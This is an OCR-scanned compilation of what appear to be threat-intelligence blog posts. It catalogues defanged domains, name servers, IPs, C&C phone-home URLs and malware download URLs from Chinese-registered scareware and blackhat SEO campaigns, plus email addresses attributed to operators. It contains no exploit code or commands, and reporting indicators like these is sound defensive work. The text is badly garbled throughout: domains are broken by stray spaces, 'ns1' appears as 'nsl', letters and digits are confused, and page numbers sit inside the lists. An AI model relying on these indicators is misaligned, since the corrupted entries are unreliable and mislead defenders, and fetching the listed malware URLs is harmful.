hxxp://baxwu hof.cn 
hxxp://wijtekof.cn 
hxxp://sknqi kof.cn 
hxxp://mussiqof.cn 
hxxp://geg wasof.cn 
hxxp://xangesof.cn 
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hxxp://wu mdewof.cn 

hxxp://hoqtayof.cn 

hxxp://kiy vayof.cn 

hxxp://cufdicuf.cn 

hxxp://gotbucuf.cn 

hxxp://gexzehuf.cn 

hxxp://cepceluf.cn 

hxxp://gepleluf.cn 

hxxp://tefhosuf.cn 

hxxp://xaqqivuf.cn 

hxxp://wu bfezuf.cn 

hxxp://panrozuf.cn 

hxxp://nad vofag.cn 

hxxp://yawj ehag.cn 

hxxp://zeltimag.cn 

hxxp://misgaqag.cn 

hxxp://noxyaxag.cn 

hxxp://sunluxag.cn 

hxxp://bozhoceg.cn 



h xx p ://d a wq ef eg. c n 

hxxp://l ocfemeg.cn 

hxxp://mivlaneg.cn 

hxxp://vaqxiseg.cn 

hxxp://gesyateg.cn 

hxxp://ku mweteg.cn 

hxxp://jefpaveg.cn 

hxxp://lilyegig.cn 

hxxp://janweqig.cn 

hxxp://diwjusig.cn 

hxxp://sohmiwig.cn 

hxxp://ri mmazig.cn 

hxxp://tirpedog.cn 

hxxp://j amguhog.cn 

hxxp://bejfakog.cn 

hxxp://bebyolog.cn 

hxxp://kixma mog.cn 

hxxp://tofyeqog.cn 

hxxp://kojxuqog.cn 

hxxp://puqtabug.cn 



hxxp://suszibug.cn 

hxxp://ciwracug.cn 

hxxp://nah bug ug.cn 

hxxp://gaygokug.cn 

hxxp://seygoqug.cn 

hxxp://helqasug.cn 

hxxp://tockesug.cn 

hxxp://jipqevug.cn 

hxxp://rewnowug.cn 

hxxp://nazxefah.cn 

hxxp://hofkagah.cn 

95 

hxxp://coszegah.cn 

hxxp://vojyojah.cn 

hxxp://nihwalah.cn 

hxxp://yojzatah.cn 

hxxp://buvsutah.cn 

hxxp://hulgadeh.cn 

hxxp://nibzofeh.cn 

hxxp://xickeqeh.cn 



hxxp://kapmereh.cn 

hxxp://regyaveh.cn 

hxxp://lizpazeh.cn 

hxxp://lujpobih.cn 

hxxp://xozyecih.cn 

hxxp://telhetih.cn 

hxxp://dussadoh.cn 

hxxp://lerbenoh.cn 

hxxp://yokveqoh.cn 

hxxp://hafgoqoh.cn 

hxxp://gagkiroh.cn 

hxxp://teftebuh.cn 

h xx p://fi tsofuh.cn 

hxxp://zi wvomuh.cn 

hxxp://fazlenuh.cn 

hxxp://gazkinuh.cn 

hxxp://d utmivuh.cn 

hxxp://zu kdayuh.cn 

hxxp://busgayuh.cn 

hxxp://nohpobaj.cn 



hxxp://qusdu maj.cn 

hxxp://wizdaqaj.cn 

hxxp://wu wbeqaj.cn 

hxxp://girzidej.cn 

hxxp://vespifej.cn 

hxxp://ceszegej.cn 

hxxp://juqbumej.cn 

hxxp://xuxmanej.cn 

Related malicious name servers known to have 
participated in the campaign: 

hxxp://nsl.quvzipda.com - 193.165.209.3 

hxxp://nsl.syquskezaja.com 

hxxp://nsl. mnysiwugpa.com 

hxxp://nsl.uzfayxlob.com 

hxxp://nsl.umkeihfub.com 

hxxp://nsl.diethealthworld.com 

hxxp://ns2.diethealthworld.com 

hxxp://nsl.pi I lshopstore.com 

hxxp://ns2.pi I lshopstore.com 

hxxp://nsl. ixcopvudeg.com 



hxxp://nsl.cuzatpih.com 
hxxp://nsl.fond ukoiwi.com 
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hxxp://nsl.zevmyxhyhl.com 
hxxp://nsl. pecsletoil.com 
hxxp://nsl.havputviwl.com 
hxxp://nsl. icuhzapyl.com 
hxxp://nsl.ollectimon.com 
hxxp://nsl.cal puwhup.com 
hxxp://nsl. mi acohder.com 
hxxp://nsl. rjycbaswes.com 
hxxp://nsl.tlyldihkis.com 
hxxp://ns2.bestfreepills.com 
hxxp://ns2.storehealthpills.com 
hxxp://nsl.medspi I lsdiscounts.com 
hxxp://nsl. ribormolu.com 
hxxp://nsl.si uxjagvyw.com 
hxxp://nsl. marttabletsrx.com 
hxxp://nsl.zirremeaby.com 
hxxp://nsl.xioduvvejy.com 



hxxp://nsl. tmypheatvy.com 
hxxp://nsl.zurmeigguz.com 
hxxp://nsl. pendyxconvam.net 
hxxp://nsl. mevkybmomu.net 
hxxp://nsl. wutvymnu.net 
hxxp://nsl.atquackephix.net 
hxxp://nsl.gneqwyapuz.net 
hxxp://nsl.az6.ru 
hxxp://nsl.compmegastore.ru 
hxxp://nsl. wearcompstore.ru 
hxxp://nsl.compnetstore.ru 
hxxp://nsl.sea portative.ru 
hxxp://nsl. webshopmag.ru 
hxxp://ns2. webshopmag.ru 
hxxp://nsl. markettradersmag.ru 
hxxp://nsl.storeonlinecomp.ru 
hxxp://nsl. I ivingmagcomp.ru 
hxxp://nsl. magcompdirect.ru 
hxxp://nsl.storemycompdirect.ru 



Related malicious domains known to have 
participated in the campaigns: 

hxxp://hyuljavmyca.com - 212.174.200.111 

hxxp://rj iofnida.com 

hxxp ://l ubetokbufa.com 

hxxp://homhylvega.com 

hxxp://syq uskezaja.com 

hxxp ://kri wmikib.com 

hxxp ://rhu wcugniob.com 

hxxp://fonrasetlid.com 

hxxp ://rycnyrfi kre.com 

hxxp ://ton I ijwe.com 

hxxp ://mefcyq wef.com 

hxxp ://l orcowurayf.com 
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hxxp://u beuhroqug.com 
hxxp ://fadjybzih.com 
hxxp ://g haknikfehi.com 
hxxp ://ksoknadsi.com 
hxxp ://fond ukoiwi.com 



hxxp://reixvykl ick.com 

hxxp://qworj ulnenk.com 

hxxp://svozq uzrel.com 

hxxp://pecsletoil.com 

hxxp://havputvi wl.com 

hxxp://pendyxcon vam.com 

hxxp://whapzi ntaon.com 

hxxp://ol I ectimon.com 

hxxp://japyebawn.com 

hxxp://xovtemfajo.com 

hxxp://shy mu moufjo.com 

hxxp://cal puwhup.com 

hxxp://iescehq ucr.com 

hxxp://thepi llcorner.com 

hxxp://kvi rincyofr.com 

hxxp://iecoq wees.com 

hxxp://syquskezaja.com - 200.204.57.187 

hxxp://cuzatpih.com 

hxxp://ol I ectimon.com 

hxxp://sl uxjagvyw.com 



hxxp://xiod uvvejy.com 
hxxp://n ravsaelvi.net 
hxxp://pendyxconvam.net 
hxxp://mevkybmomu.net 
hxxp://atquackeph ix.net 
hxxp://g neqwyapuz.net 

Related malicious domains known to have 
participated in the campaign: 

hxxp://tovpuveb.cn 

hxxp://risregib.cn 

hxxp://sapwopub.cn 

hxxp://kutwuzub.cn 

hxxp://dijmigac.cn 

hxxp://davzunic.cn 

hxxp://cuwlicoc.cn 

hxxp://hinkizad.cn 

hxxp://tiwkicid.cn 

hxxp://giddehid.cn 

hxxp://qehmujid.cn 

hxxp://jadyoxid.cn 



hxxp://yipxakud.cn 

hxxp://qophepud.cn 

hxxp://nawfusud.cn 

hxxp://xohpebaf.cn 
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hxxp://yilqobaf.cn 

hxxp://gelkinef.cn 

hxxp://zigconef.cn 

h xx p://va sgotef.cn 

hxxp://gitmufif.cn 

hxxp://pujxatof.cn 

hxxp://tagcafuf.cn 

hxxp://j oywehuf.cn 

hxxp://xogg unuf.cn 

hxxp://pezpipuf.cn 

hxxp://gugfequf.cn 

hxxp://kattowuf.cn 

hxxp://rosmicag.cn 

hxxp://nag nuteg.cn 

hxxp://fohjedig.cn 



hxxp://hijderig.cn 

hxxp://dittomog.cn 

hxxp://zu bwefah.cn 

hxxp://fodpohah.cn 

hxxp://seh viwah.cn 

hxxp://hifkuneh.cn 

hxxp://bidfecih.cn 

hxxp://wuxmulih.cn 

hxxp://beq wacoh.cn 

hxxp://q ukvimoh.cn 

hxxp://vasxavoh.cn 

hxxp://salxaxoh.cn 

hxxp://labyocaj.cn 

hxxp://zigxadij.cn 

hxxp://hixkanij.cn 

hxxp://zixkitoj.cn 

hxxp://zijzoguj.cn 

hxxp://yiwzuluj.cn 

hxxp://survuruj.cn 

hxxp://feftuqak.cn 



hxxp://ziscawak.cn 

hxxp://wacpowek.cn 

hxxp://segjinuk.cn 

hxxp://viqfizuk.cn 

hxxp://qawgegal.cn 

hxxp://loqfogal.cn 

hxxp://sihwohal.cn 

hxxp://babtakal.cn 

hxxp://nag nemel.cn 

hxxp://ribwegil.cn 

hxxp://watpiyil.cn 

hxxp://goxma bul.cn 

hxxp://siwkecul.cn 

hxxp://selzimul.cn 

hxxp://qakwivul.cn 

99 

hxxp://bedvuyul.cn 

hxxp://fiddozul.cn 

hxxp://joldokim.cn 

hxxp://foztokim.cn 



hxxp://wokl ah um.cn 

hxxp://gavsanum.cn 

hxxp://kej rupum.cn 

hxxp://hagj atum.cn 

hxxp://xu mfuzum.cn 

hxxp://mafcocan.cn 

hxxp://geq kedan.cn 

hxxp://fu mhasan.cn 

hxxp://zosqinen.cn 

hxxp://nonzinen.cn 

hxxp://tahyedin.cn 

hxxp://niyyurin.cn 

hxxp://wokmison.cn 

hxxp://nekmerun.cn 

hxxp://gebzevun.cn 

hxxp://dizxohap.cn 

hxxp://wi rzovap.cn 

hxxp://cobyizip.cn 

hxxp://sokwi mop.cn 

hxxp://digjipop.cn 



hxxp://qagtohup.cn 

hxxp://wodkepaq.cn 

hxxp://kuqqavaq.cn 

hxxp://vogyafeq.cn 

hxxp://qokyaziq.cn 

hxxp://gelmaloq.cn 

hxxp://rikxeduq.cn 

hxxp://mifzoy uq.cn 

hxxp://j itmekar.cn 

hxxp://zedbeper.cn 

hxxp://qoyrifir.cn 

hxxp://rerbogir.cn 

hxxp://nexyutir.cn 

hxxp://y uvwobor.cn 

hxxp://raddijor.cn 

hxxp://rehci ror.cn 

h xx p://j owqasor.cn 

hxxp://wotrisor.cn 

hxxp://tinselur.cn 

hxxp://sacvakes.cn 



hxxp://xonlefis.cn 
hxxp://seh wukos.cn 
hxxp://torxupos.cn 
hxxp://yujzidus.cn 
hxxp://dejzezat.cn 
hxxp://gunjivet.cn 
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hxxp://hecfocav.cn 
hxxp://yuxdiqav.cn 
hxxp://guysogiv.cn 
hxxp://tebziniv.cn 
hxxp://dedsu pov.cn 
hxxp://gen wsxov.cn 
hxxp://xaycozuv.cn 
hxxp://fojgoraw.cn 
hxxp://su wsozaw.cn 
hxxp://h udwuhew.cn 
hxxp://momzuhew.cn 
hxxp://pi bwokiw.cn 
hxxp://lacfimiw.cn 



hxxp://jubduriw.cn 

hxxp://talcuviw.cn 

hxxp://xavgu bow.cn 

hxxp://zovcofow.cn 

hxxp://qopzu bax.cn 

hxxp://dogqodax.cn 

hxxp://jimjakax.cn 

hxxp://ricnafex.cn 

hxxp://nad I ewex.cn 

hxxp://mokcegox.cn 

hxxp://getkixox.cn 

hxxp://wucpulux.cn 

hxxp://dalpobay.cn 

hxxp://refh agay.cn 

hxxp://jusyadey.cn 

hxxp://req pijey.cn 

hxxp://vebzaqiy.cn 

h xx p://sej tog oy.cn 

hxxp://yecnaquy.cn 

hxxp://xufg uyuy.cn 



hxxp://pu ktunaz.cn 
hxxp://zaztu vaz.cn 
hxxp://sixbufiz.cn 
hxxp://nofdowiz.cn 
hxxp://cuvxoqoz.cn 
hxxp://yug kiwuz.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://columnultra.com - 58.17.3.41 

hxxp://mi I khold.com 

hxxp://eagerboard.com 

hxxp://yeson lynoun.com 

hxxp://d ifferdo.com 

hxxp://seemlykeep.com 

hxxp://seemnear.com 

hxxp://modernbut.com 
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Related malicious domains known to have 
participated in the campaign: 

hxxp://litgukab.cn 

hxxp://xojyupab.cn 



hxxp://ritlarab.cn 

hxxp://qeqyu keb.cn 

hxxp://fedpijib.cn 

hxxp://xu mlodob.cn 

hxxp://kozgewob.cn 

hxxp://fajnahec.cn 

hxxp://nedsicic.cn 

hxxp://hertuqic.cn 

hxxp://linrudoc.cn 

hxxp://gilqufuc.cn 

hxxp://lijwituc.cn 

hxxp://loqbaxuc.cn 

hxxp://camxezuc.cn 

hxxp://foyxolad.cn 

hxxp://bapvusad.cn 

hxxp://wokmeyad.cn 

hxxp://yizqosed.cn 

hxxp://vi vwiwef.cn 

hxxp://percaqof.cn 

hxxp://cepceluf.cn 



hxxp://paqhizuf.cn 

hxxp://vorvi vag.cn 

hxxp://may nixeg.cn 

hxxp://mujyu mig.cn 

h xx p://c oyrekog.cn 

hxxp://xetvetih.cn 

hxxp://mugyuj uh.cn 

hxxp://supsizuh.cn 

hxxp://bixtakaj.cn 

hxxp://lanmixej.cn 

hxxp://worxezej.cn 

hxxp://tikgepij.cn 

hxxp://yatsanak.cn 

hxxp://tucgosak.cn 

hxxp://h ihnuwak.cn 

hxxp://qilfadek.cn 

hxxp://zibsitik.cn 

hxxp://xetmoj ok.cn 

hxxp://yelsecuk.cn 

hxxp://confowuk.cn 



hxxp://pozzoxuk.cn 
hxxp://savhixal.cn 
hxxp://nudtaqel.cn 
hxxp://keptavol.cn 
hxxp://berq ufam.cn 
hxxp://wuq rulam.cn 
hxxp://gofti wam.cn 
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hxxp://vowcaj em.cn 

hxxp://rizfinim.cn 

hxxp://j etgekom.cn 

hxxp://letjucun.cn 

hxxp://wi vwiqap.cn 

hxxp://duccesap.cn 

hxxp://zamy isap.cn 

hxxp://ranpovep.cn 

hxxp://kucdawep.cn 

hxxp://limjapip.cn 

hxxp://ciggecop.cn 

hxxp://ziybelop.cn 



hxxp://yakq uyeq.cn 

hxxp://borremiq.cn 

hxxp://vuzwesuq.cn 

hxxp://rosvocor.cn 

hxxp://hakd ugas.cn 

hxxp://kabmebes.cn 

hxxp://purhuves.cn 

hxxp://gopmocis.cn 

hxxp://cabziqis.cn 

hxxp://pomzonos.cn 

hxxp://zojvapus.cn 

hxxp://nobfemat.cn 

hxxp://ritcubav.cn 

hxxp://bibbikev.cn 

hxxp://daslulev.cn 

hxxp://naczoduv.cn 

hxxp://betjoqiw.cn 

hxxp://yoq I amow.cn 

hxxp://j awjeqow.cn 

hxxp://zijmivuw.cn 



hxxp://d upqozuw.cn 

hxxp://fatnudax.cn 

h xx p://d efrogax.cn 

hxxp://kalyahax.cn 

hxxp://toztipax.cn 

hxxp://gecfopax.cn 

hxxp://wuqzu bex.cn 

hxxp://hexpadix.cn 

hxxp://luhnukox.cn 

hxxp://vecbibey.cn 

hxxp://d imgecey.cn 

hxxp://fammu vey.cn 

hxxp://zepfabiy.cn 

hxxp://gewvamiy.cn 

hxxp://pekzariy.cn 

hxxp://pixkinaz.cn 

hxxp://mecq ulez.cn 

hxxp://yubreliz.cn 
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hxxp://j uvmeriz.cn 



hxxp://mafcixiz.cn 

hxxp://butlezoz.cn 

hxxp://xisqapuz.cn 

hxxp://jihkohab.cn 

hxxp://litgukab.cn 

hxxp://xojyupab.cn 

hxxp://ritlarab.cn 

hxxp://qancabeb.cn 

hxxp://xaq kabeb.cn 

hxxp://qeqyu keb.cn 

hxxp://bobhoneb.cn 

hxxp://fedpijib.cn 

hxxp://kozgewob.cn 

hxxp://mirlacub.cn 

hxxp://jokrogub.cn 

hxxp://qupbihac.cn 

hxxp://viqnijac.cn 

hxxp://bucdawac.cn 

hxxp://latzoyac.cn 

h xx p://f erkogec.cn 



hxxp://qujqugec.cn 

hxxp://fajnahec.cn 

hxxp://saybilec.cn 

hxxp://yaxxosec.cn 

hxxp://nedsicic.cn 

hxxp://cimhijic.cn 

hxxp://hertuqic.cn 

hxxp://linrudoc.cn 

hxxp://mah hekoc.cn 

hxxp://pegvijuc.cn 

hxxp://camxezuc.cn 

hxxp://kossehad.cn 

hxxp://bapvusad.cn 

hxxp://coffebed.cn 

hxxp://xadjeqid.cn 

hxxp://pehxarid.cn 

hxxp://maknohod.cn 

hxxp://yujhaqod.cn 

hxxp://vevteyod.cn 

hxxp://ri nmumud.cn 



hxxp://xuldeyud.cn 

h xx p://fed rujaf.cn 

hxxp://n ugnosaf.cn 

hxxp://koxpelef.cn 

hxxp://tecyatef.cn 

h xx p ://h e mf o wef. c n 

hxxp://pavlegif.cn 

hxxp://percaqof.cn 

hxxp://sizkeyof.cn 
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hxxp://zug kucuf.cn 

hxxp://rijhuhuf.cn 

hxxp://cepceluf.cn 

hxxp://paqhizuf.cn 

hxxp://xowj icag.cn 

hxxp://dofpalag.cn 

hxxp://hujrulag.cn 

hxxp://maxtayag.cn 

hxxp://qekvoceg.cn 

hxxp://vazwu reg.cn 



hxxp://pilpuweg.cn 
hxxp://wed ruweg.cn 
h xx p://c ex kezeg.cn 
hxxp://mujyu mig.cn 
hxxp://wintabog.cn 
hxxp://n uzmohog.cn 
hxxp://coyrekog.cn 
hxxp://tu bvuxog.cn 
hxxp://zavdahug.cn 
hxxp://yukpikug.cn 
hxxp://mu wsikeh.cn 
hxxp://pecculeh.cn 
hxxp://rafniteh.cn 
hxxp://n ukfijih.cn 
hxxp://xetvetih.cn 
hxxp://tikbacoh.cn 
hxxp://zi kwufuh.cn 
hxxp://mugyuj uh.cn 
hxxp://hijbumuh.cn 
hxxp://wu bxayuh.cn 



hxxp://quntoyuh.cn 

hxxp://supsizuh.cn 

hxxp://techegaj.cn 

hxxp://bixtakaj.cn 

hxxp://wu wbeqaj.cn 

hxxp://caqhiqaj.cn 

hxxp://lijzarej.cn 

hxxp://lanmixej.cn 

hxxp://jutzuzej.cn 

hxxp://betkawij.cn 

hxxp://mumrojoj.cn 

hxxp://wu I kukoj.cn 

hxxp://selqetuj.cn 

hxxp://zuvbowuj.cn 

hxxp://sevpohak.cn 

hxxp://qusvilak.cn 

hxxp://qowrirak.cn 

hxxp://tucgosak.cn 

hxxp://bajhukek.cn 

hxxp://qeyzecik.cn 



105 


hxxp ://pij ridik.cn 

hxxp://yecgajik.cn 

hxxp://tovboqik.cn 

hxxp://sirrotik.cn 

hxxp://pomzexik.cn 

hxxp://nopvafok.cn 

hxxp ://xetmoj ok.cn 

hxxp://fuqzuxok.cn 

hxxp ://xaj kimuk.cn 

hxxp://confowuk.cn 

hxxp://pozzoxuk.cn 

hxxp://vufmikal.cn 

hxxp://korkusal.cn 

hxxp://yasdaxal.cn 

hxxp://nibnupel.cn 

hxxp://nudtaqel.cn 

hxxp://zivwirel.cn 

hxxp://facjacil.cn 

hxxp://qaqdidil.cn 



h xx p: //z i rm idil.cn 
hxxp://pivteqil.cn 
hxxp://mutzomol.cn 
hxxp://bahfosol.cn 
hxxp://kajvatol.cn 
hxxp://keptavol.cn 
hxxp://mevvuqul.cn 
hxxp://berq ufam.cn 
hxxp://zi hwujam.cn 
hxxp://j ormofem.cn 
hxxp://vowcaj em.cn 
hxxp://yawy ibim.cn 
hxxp://mi byumim.cn 
hxxp://pabfakom.cn 
hxxp://j etgekom.cn 
hxxp://xolkizom.cn 
hxxp://muj si kum.cn 
hxxp://moy nukan.cn 
hxxp://ranfelan.cn 
hxxp://kayjamen.cn 



hxxp://kudcedon.cn 
hxxp://getwison.cn 
hxxp://givjivon.cn 
hxxp://faykirun.cn 
hxxp://zebxaxun.cn 
hxxp://coclecap.cn 
hxxp://texnipap.cn 
hxxp://humyipap.cn 
hxxp://duccesap.cn 
hxxp://zamy isap.cn 
hxxp://lunyicep.cn 
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hxxp://ranpovep.cn 
hxxp://yifkebip.cn 
hxxp://yiryemip.cn 
hxxp://mowmoq ip.cn 
hxxp://wozh ihop.cn 
hxxp://mefrexop.cn 
hxxp://qidyubup.cn 
hxxp://qidjohup.cn 



hxxp://lotjolup.cn 

hxxp://dirdotup.cn 

hxxp://memqowaq.cn 

hxxp://civvufeq.cn 

hxxp://bobfiliq.cn 

hxxp://borremiq.cn 

hxxp://singuroq.cn 

hxxp://qudjuvoq.cn 

hxxp://vuzwesuq.cn 

hxxp://n uvmotuq.cn 

hxxp://zohcidar.cn 

hxxp://rentu mar.cn 

hxxp://fipzaqar.cn 

hxxp://siqcatar.cn 

hxxp://sagvitar.cn 

hxxp://luqsiger.cn 

hxxp://zuyxewer.cn 

hxxp://jagnuyer.cn 

hxxp://ruhbulir.cn 

hxxp://sityeyir.cn 



hxxp://rosvocor.cn 

hxxp://julxapor.cn 

hxxp://rixlupur.cn 

hxxp://j utfisur.cn 

hxxp://fa bmotur.cn 

hxxp://bukpuzur.cn 

hxxp://pozsigas.cn 

hxxp://hakd ugas.cn 

hxxp://lokzihas.cn 

hxxp://mu kkebes.cn 

hxxp://mijpedes.cn 

hxxp://conzakes.cn 

hxxp://fod bemes.cn 

hxxp://maq pumes.cn 

hxxp://purhuves.cn 

hxxp://hohgibis.cn 

hxxp://kezyubis.cn 

hxxp://gopmocis.cn 

hxxp://soqsedis.cn 

hxxp://defdoris.cn 



hxxp://pomzonos.cn 

hxxp://lanhovus.cn 

107 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Drops Scareware (2018-10-21 
23:55) 

It's 2008 and I've recently stumbled upon a currently active 
malicious and fraudulent blackhat SEO campaign 

successfully enticing users into falling victim into fake 
security software also known as scareware including a 
variety 

of dropped fake codecs largely relying on the acquisition of 
legitimate traffic through active blackhat SEO campaigns 

in this particular case various North Korea news including 
Mike Tyson's daughter themed campaigns. 

Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://fi97.net 

hxxp://is-the-boss.com - Email: dantsr@gmail.com 

Related malicious domains known to have 
participated in the campaign: 



hxxp://north-korea-news.moviegator.us 

Related malicious domains known to have 
participated in the campaign: 

hxxp://petrenko.biz 

Related malicious domains known to have 
participated in the campaign: 

hxxp://teensxporn.com - 66.197.165.41 - Email: 
robertxssmith@googlemail.com 

hxxp://a prettygirls.com 

hxxp://a nalporntube.com 

hxxp://tuexxxteen.com 

hxxp://ltu bexxx.com 

hxxp://teen boobstube.com 

hxxp://tu bexxxteen.com 

Related rogue YouTube accounts known to have 
participated in the campaign: 

hxxp://www.youtu be.com/user/afohebac5ar 

hxxp://www.youtube.com/user/irufupolOop 

Related malicious domains known to have 
participated in the campaign: 

hxxp://get-mega-tube.com - 216.240.143.7 

hxxp://get-mega-tube.com 



hxxp://my-flare-tu be.com 
hxxp://best-c rystal-tube.com 
hxxp://powerful-tu be.com 
hxxp://cheery-tube-portal.com 
hxxp://jazzy-tu bs.com 
hxxp://video-tube-dot.com 
hxxp://my-tube-show.com 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://mgj mnfgbdfb.com/fff9999.php 

hxxp://mgj mnfgbdfb.com/eee9999.php 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://i mageempires.com/perce/9dc0266f8077f4b2cd9411 
ed48ecdda988af00003bl280c 

47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg 

hxxp://i magescolor.com/item/adb0765f302764425d74cl2df 
84cbd29185f9070bb2230a 


42e0958e050299908delc5f0844c2579e3/20c/item.gif 
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hxxp://pictu rehappiness.com/werber/207/216.jpg 

hxxp://arch iveexefiles09.com/file.exe 

Related malicious URLs known to have participated 
in the campaign: 

hxxp://archiveexefi I es09.com/softwarefortubeview.45016.ex 
e 

Related malicious URLs known to have participated 
in the campaign: 

hxxp://archiveexefiles09.com - 91.212.65.54 

hxxp://exefi I esstorage.com 

hxxp://exearchstortage.com 

hxxp://g randfilesstore.com 

hxxp://arch-g randsoftarchive.com 

hxxp://hex-prog rammers.com 

hxxp ://ki r-fi I eplanet.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - A Diversified Portfolio of Fake 
Security Software (2018-10-22 13:33) 



It's 2010 and I've recently stumbled upon a currently active 
and circulating malicious and fraudulent porfolio of 

fake security software also known as scareware potentially 
enticing hundreds of thousands of users to a multi-tude 

of malicious software with the cybercriminals behind the 
campaign potentially earning fraudulent revenue in the 

process of monetizing access to malware-infected hosts 
largely relying on the utilization of an affiliate network- 
based 

type of revenue sharing scheme. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://thebest-antivirusOO.com - 91.212.226.203; 
94.228.209.195 

hxxp://vi russcannerproO.com 

hxxp ://l ightandfastscanner01.com 

hxxp://thebest-antivi rus01.com 

hxxp ://thebestanti virus01.com 

hxxp ://remove-spyware-ll.com 

hxxp://remove-vi rus-ll.com 

hxxp ://thebest-antivi rusll.com 

hxxp ://anti spyware-modulel.com 

hxxp ://anti spywaremodulel.com 



hxxp://anti virus-tool srl.com 
hxxp://thebest-anti virusl.com 
hxxp://thebest-anti virusxl.com 
hxxp://thebestanti virus02.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://del ete-all-virus-22.com 
hxxp://l ightandfastscanner22.com 
hxxp://prosecureprotection2.com 
hxxp://vi russcannerpro2.com 
hxxp://anti virus-tool sr2.com 
hxxp://thebest-anti virusx2.com 
hxxp://thebestanti virus03.com 
hxxp://remove-spyware-13.com 
hxxp://remove-vi rus-13.com 
hxxp ://antispywa re-mod ule3.com 
hxxp ://antispywa remodule3.com 
hxxp ://vi russcannerpro3.com 
hxxp ://wi ndowsantivirusserver3.com 
hxxp ://thebest-anti virusx3.com 



hxxp://thebestanti virus04.com 
hxxp://remove-spywa re-14.com 
hxxp://remove-vi rus-14.com 
hxxp ://antispywa re-scann4.com 
hxxp://anti virus-tool sr4.com 
hxxp ://thebest-anti virusx4.com 
hxxp ://thebestanti virus05.com 
hxxp ://remove-a I l-spyware-55.com 
hxxp ://del ete-all-virus-55.com 
hxxp ://thebest-antivi rusx5.com 
hxxp://remove-spyware-16.com 
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hxxp ://l ightandfastscanner66.com 
hxxp ://antispywa remodule6.com 
hxxp ://antispywa re-mod ule7.com 
hxxp ://antispywa remodule7.com 
hxxp ://anti virus-tool sr7.com 
hxxp ://antispywa re-scann8.com 
hxxp://pro-secu re-protection8.com 
hxxp ://wi ndowsantivirusserver8.com 



hxxp ://antispywa re-mod ule9.com 
hxxp ://antispywa remodule9.com 
hxxp ://antispywa re-scann9.com 
hxxp ://vi russcannerpro9.com 
hxxp ://anti virus-tool sr9.com 
hxxp ://thebest-anti virus9.com 
hxxp ://anti virusprolscan.com 
hxxp ://anti viruspro2scan.com 
hxxp ://anti viruspro7scan.com 
hxxp ://anti viruspro8scan.com 
hxxp ://anti viruspro9scan.com 
hxxp ://antispywa re6sacnner.com 
hxxp ://anti virusvltools.com 
hxxp ://antispywa relOwindows.com 
hxxp ://antispywa re20windows.com 
hxxp ://anti virus-tool svv.com 
hxxp ://remove-spywa re-11, com 
hxxp ://remove-vi rus-ll.com 
hxxp://remove-spyware-12.com 
hxxp ://remove-vi rus-12.com 



hxxp://del ete-all-virus-22.com 

hxxp://prosecureprotection2.com 

hxxp://remove-spyware-13.com 

hxxp://remove-vi rus-13.com 

hxxp://wi ndowsantivirusserver3.com 

hxxp://remove-spywa re-14.com 

hxxp://remove-vi rus-14.com 

hxxp://remove-a I l-spyware-55.com 

hxxp://del ete-all-virus-55.com 

hxxp://remove-spyware-16.com 

hxxp://pro-secu re-protection8.com 

hxxp://wi ndowsantivirusserver8.com 

hxxp://a ntivirus-toolsr9.com 

hxxp://a ntivirusvltools.com 

hxxp://a ntispywarelOwindows.com 

hxxp://a ntispyware20windows.com 

hxxp://a ntivirus-toolsvv.com 

Related malicious domains known to have 
participated in the campaign: 


hxxp://run-anti virusscanO.com 



hxxp://ru nantivirusscanO.com 
hxxp://remove-spywa re-11, com 
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hxxp://remove-virus-ll.com 
hxxp://run-vi rus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://del ete-all-virus-22.com 
hxxp://remove-spyware-13.com 
hxxp://remove-vi rus-13.com 
hxxp://ru nantivirusscan3.com 
hxxp://ru n-virusscanner3.com 
hxxp://remove-spywa re-14.com 
hxxp://remove-vi rus-14.com 
hxxp://ru n-virusscanner4.com 
hxxp://remove-vi rus-15.com 
hxxp://remove-a I l-spyware-55.com 
hxxp://del ete-all-virus-55.com 
hxxp://remove-spyware-16.com 
hxxp://ru n-virus-scanner6.com 



hxxp://ru n-virusscanner6.com 

hxxp://ru nantivirusscan8.com 

hxxp://ru n-virus-scanner8.com 

hxxp://wi ndowsantivirusserver8.com 

hxxp://ru n-virus-scanner9.com 

hxxp://ru n-virusscanner9.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://run-a ntivirusscanO.com 

hxxp://run-a ntivirusscanl.com 

hxxp://ru n-antivirusscan3.com 

hxxp://ru n-antivirusscan6.com 

hxxp://ru n-antivirusscan8.com 

hxxp://ru nantivirusscanO.com 

hxxp://ru nantivirusscan3.com 

hxxp://ru nantivirusscan4.com 

hxxp://ru nantivirusscan9.com 

hxxp://secu repro-antivirusl.com 

Related malicious domains known to have 
participated in the campaign: 


hxxp://anti-vi rus-systemO.com 



hxxp://ru n-antivirusscanO.com 
hxxp://ru nantivirusscanO.com 
hxxp://perform-anti virus-scan-l.com 
hxxp://remove-spywa re-11, com 
hxxp://remove-virus-ll.com 
hxxp://anti virus-systeml.com 
hxxp://performspywarescanl.com 
hxxp://run-vi rus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://del ete-all-virus-22.com 
hxxp://anti virus-scan ner-3.com 
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hxxp://remove-spyware-13.com 
hxxp://remove-vi rus-13.com 
hxxp://ru nantivirusscan3.com 
hxxp://ru n-virusscanner3.com 
hxxp://remove-spywa re-14.com 
hxxp://remove-vi rus-14.com 
hxxp://g I oriousantivirus2014.com 



hxxp://ru n-virusscanner4.com 

hxxp://smart-pcscan ner05.com 

hxxp://remove-vi rus-15.com 

hxxp://remove-a I l-spyware-55.com 

hxxp://del ete-all-virus-55.com 

hxxp://perform-vi rus-scan5.com 

hxxp://perform-anti virus-scan-6.com 

hxxp://a ntivirus-scanner-6.com 

hxxp://remove-spyware-16.com 

hxxp://ru n-virus-scanner6.com 

hxxp://ru n-virusscanner6.com 

hxxp://a ntivirus-scan-server6.com 

hxxp://perform-anti virus-scan-7.com 

hxxp://perform-antivi rus-test-7 .com 

